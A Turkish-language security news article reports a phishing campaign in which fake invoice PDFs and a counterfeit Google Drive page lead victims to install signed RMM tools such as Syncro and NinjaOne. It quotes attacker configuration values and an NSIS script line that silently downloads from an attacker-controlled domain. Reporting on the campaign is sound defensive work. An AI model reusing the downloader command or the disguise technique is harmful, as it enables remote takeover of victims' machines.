Tehdit aktörlerinin, kullanıcıları sistemlerine uzaktan izleme ve yönetim araçları yüklemeleri için kandırmak amacıyla silahlı PDF dosyaları kullandığı yeni bir siber saldırı dalgası ortaya çıktı.
Bu saldırılar, kurban makinelere yetkisiz erişim sağlamak için Syncro, SuperOps, NinjaOne ve ConnectWise ScreenConnect gibi RMM yazılımlarının güvenilir doğasından yararlanır.
Kötü amaçlı PDF belgelerinin “Fatura”, “Ürün Siparişi” ve “Ödeme” gibi dosya adlarıyla gizlenmiş olması, bunların hem işletmeleri hem de bireyleri hedef alan kimlik avı e-posta kampanyaları yoluyla dağıtıldığını gösteriyor.
Kullanıcılar bu PDF dosyalarını açtıklarında ya önizlemeyi engelleyen yüksek kaliteli bir görüntüyle ya da “PDF belgesi yüklenemedi” hata mesajıyla karşılaşıyorlar.
Her iki senaryoda da mağdurlar, kendilerini sahte Google Drive sayfalarına veya Adobe’nin kimliğine bürünen sahte web sitelerine yönlendiren bir bağlantıya tıklamaya teşvik ediliyor.
Sahte Google Drive sayfası, aslında kılık değiştirmiş bir RMM yükleyicisi olan “Video_recorded_on_iPhone17.mp4” adlı bir video dosyası gibi görünen bir dosyayı görüntüler.
İndirilen dosya, kullanıcıları meşru bir video indirdiklerine daha fazla ikna etmek için “Video_recorded_on_iPhone17.mp4 Drive.google.com” yanıltıcı adlandırma modelini koruyor.
ASEC araştırmacıları, kötü niyetli yükleyicileri imzalamak için kullanılan dijital sertifikalara dayanarak bu saldırıların en az Ekim 2025’ten beri devam ettiğini belirledi.
Bu kampanyanın arkasındaki tehdit aktörü, güvenlik ürünleri tarafından tespit edilmekten kaçınmak için tümü aynı geçerli sertifikayla imzalanmış birden fazla RMM aracını sistematik olarak dağıtıyor.
.webp)
RMM araçları meşru yönetim amaçları için tasarlandığından ve arka kapılar veya Uzaktan Erişim Truva Atları gibi geleneksel kötü amaçlı yazılımlar olarak sınıflandırılmadığından, bu yaklaşım saldırganların geleneksel güvenlik önlemlerini atlamalarına olanak tanır.
.webp)
Saldırı, güvenlik çözümlerinin RMM yazılımına duyduğu doğal güvenden yararlanıyor. Bu araçlar, Yönetilen Hizmet Sağlayıcıları ve BT ekipleri tarafından meşru uzaktan yönetim amacıyla yaygın olarak kullanıldığından, güvenlik duvarları ve kötü amaçlı yazılımdan koruma programları genellikle bunları tehdit olarak tanımlamakta zorlanır.
Bu, saldırganların güvenliği ihlal edilmiş sistemlere kalıcı uzaktan erişim sağlamak için aktif olarak yararlandığı tehlikeli bir kör nokta oluşturur.
Enfeksiyon Mekanizmasının Teknik Dağılımı
Virüs bulaşma süreci, kurbanın sahte Google Drive sayfasından video dosyası olduğuna inandığı dosyayı indirmesiyle başlıyor.
İndirilen yürütülebilir dosya aslında Gelişmiş Yükleyici veya NSIS ile oluşturulmuş ve RMM aracını hedef sisteme dağıtan bir yükleyicidir.
.webp)
Syncro RMM kurulumları için kötü amaçlı yazılım, yürütme sırasında “yK0UAOaHHwdbYDOp_sr51w” “anahtar” değeri ve “1709830” “müşteri kimliği” dahil olmak üzere belirli parametreler kullanır.
Bu yapılandırma ayrıntıları, tehdit aktörünün virüslü makineleri RMM platformunun meşru altyapısı aracılığıyla tanımlamasına ve uzaktan kontrol etmesine olanak tanır.
.webp)
NSIS tabanlı indirici çeşidi, saldırgan tarafından kontrol edilen sunuculardan ek yükler getiren yerleşik komut dosyaları içerir. Kötü amaçlı NSI betiği aşağıdaki gibi komutları çalıştırır:
StrCpy $0 $TEMP\temp_response.html
INetC::get/silent https://anhemvn124.com $0Bu komut, kötü amaçlı etki alanından dosyaları sessizce indirir ve sistemi daha fazla riske hazırlar. Yükleyici daha sonra kullanıcı algılamasını önlemek için Windows Installer’ı sessiz mod yürütmeyle kullanarak NinjaOne RMM’yi dağıtır.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
